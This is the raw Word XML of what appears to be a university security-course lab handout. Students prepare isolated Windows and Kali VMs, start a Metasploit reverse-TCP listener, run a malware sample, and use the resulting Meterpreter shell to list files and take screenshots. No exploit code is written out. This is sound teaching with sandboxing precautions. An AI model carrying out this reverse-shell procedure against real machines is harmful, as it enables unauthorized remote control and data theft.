      </w:pPr>
      <w:r w:rsidR="04486216">
        <w:rPr/>
        <w:t>Verify that you have a current snapshot of your Windows VM and Kali VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="69E4FCF8" w14:textId="2223A58A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="04486216">
        <w:rPr/>
        <w:t>Verify that your VMs are (only) on the isolated internal network by executing ping commands from a terminal (which should receive no reply from an outside domain such as google.com or 8.8.8.8).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="449E9025" w14:textId="3A89744E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="04486216">
        <w:rPr/>
        <w:t xml:space="preserve">Follow the instructions here to initiate a Metasploit session on the Kali machine and set up a reverse-TCP listener in the session: </w:t>
      </w:r>
      <w:hyperlink r:id="R14684beb27a44496">
        <w:r w:rsidRPr="04486216" w:rsidR="04486216">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Documentation: Using a Reverse Shell in Metaploit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="6398DC2B" w14:textId="6AE653EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="04486216">
        <w:rPr/>
        <w:t>Run the malware sample on the Windows VM (e.g. by double-clicking its icon).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="39E7E73D" w14:textId="2DDD7A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="04486216">
        <w:rPr/>
        <w:t>Observe the establishment of a TCP connection on the Kali machine, and the creation of a “Meterpreter” shell to interact with the malware payload’s reverse TCP connection on the Windows machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="07EDDC96" w14:textId="5B057A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="04486216">
        <w:rPr/>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="04486216">
        <w:rPr/>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="04486216">
        <w:rPr/>
        <w:t xml:space="preserve"> session as desired to list files, take screenshots, and otherwise verify that the exploit was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="573E87DA" w14:textId="233B90C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="04486216">
        <w:rPr/>
        <w:t>When finished, close the sessions on the Kali VM, turn off both VMs, and revert to the snapshots taken before you ran the malware.   (This is always a good practice after running a potential-malware sample, as an unknown code sample may produce side effects in the system of which we’re unaware when we run it.)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00300449">
      <w:headerReference w:type="default" r:id="rId23"/>
      <w:footerReference w:type="default" r:id="rId24"/>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4143" w:rsidRDefault="00754143" w14:paraId="6D8329CE" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00754143" w:rsidRDefault="00754143" w14:paraId="7A02843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0E472A" w:rsidTr="1A0E472A" w14:paraId="0E8AF62B" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="1A0E472A" w:rsidP="1A0E472A" w:rsidRDefault="1A0E472A" w14:paraId="354B61E0" w14:textId="6FE922A8">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="1A0E472A" w:rsidP="1A0E472A" w:rsidRDefault="1A0E472A" w14:paraId="2D5C211F" w14:textId="08ABE1D2">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="1A0E472A" w:rsidP="1A0E472A" w:rsidRDefault="1A0E472A" w14:paraId="22F5C2F9" w14:textId="7EABE314">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="1A0E472A" w:rsidP="1A0E472A" w:rsidRDefault="1A0E472A" w14:paraId="4FB53AB9" w14:textId="21AA0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4143" w:rsidRDefault="00754143" w14:paraId="279DD1C5" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00754143" w:rsidRDefault="00754143" w14:paraId="6C66A9A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0E472A" w:rsidTr="1A0E472A" w14:paraId="327B9AB7" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="1A0E472A" w:rsidP="1A0E472A" w:rsidRDefault="1A0E472A" w14:paraId="2C7CEFE7" w14:textId="7844607C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
            <w:rPr>
              <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="1A0E472A">
            <w:rPr>
              <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>CSE 434S</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="1A0E472A" w:rsidP="1A0E472A" w:rsidRDefault="1A0E472A" w14:paraId="73E1819B" w14:textId="643F33D0">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="1A0E472A" w:rsidP="1A0E472A" w:rsidRDefault="1A0E472A" w14:paraId="4D9CCDAD" w14:textId="777B478A">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="1A0E472A" w:rsidP="1A0E472A" w:rsidRDefault="1A0E472A" w14:paraId="05DEAC8A" w14:textId="503463C7">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>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50af6f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3ac1b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DF6A3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616AA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278EB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4EC72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rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbo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E8CE4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C64A2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06F3DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="2ED858D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BB9AB5CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F7A652B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A5D44DC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="22E89C5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1EB2DFF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A0F20588">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6F9294D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D096B176">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7A083991"/>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0">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="1" w16cid:durableId="1588879752">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="138426180">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="139619780">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="291441963">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="972557608">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1975793300">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1464537224">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1409959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0E472A"/>
    <w:rsid w:val="00300449"/>
    <w:rsid w:val="004A1E86"/>
    <w:rsid w:val="00754143"/>
    <w:rsid w:val="04486216"/>
    <w:rsid w:val="0ACA1E19"/>
    <w:rsid w:val="11C18713"/>
    <w:rsid w:val="12986DF7"/>
    <w:rsid w:val="1A0E472A"/>
    <w:rsid w:val="1A6C870A"/>
    <w:rsid w:val="2B361AEC"/>
    <w:rsid w:val="2F6B2107"/>
    <w:rsid w:val="39A93E11"/>
    <w:rsid w:val="5D8D4A02"/>
    <w:rsid w:val="757F7D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1D3B982"/>
  <w15:docId w15:val="{C77F1A05-ADCE-476D-9BF6-7D30DE31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5.png"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image" Target="media/image4.png"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image" Target="media/image3.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image" Target="media/image2.png" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adfoster-r7.github.io/metasploit-framework/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html" TargetMode="External" Id="R14684beb27a444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Cole, Steve</lastModifiedBy>
  <revision>2</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-09T15:55:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-09T16:32:10.3469225Z</dcterms:modified>
</coreProperties>
</file>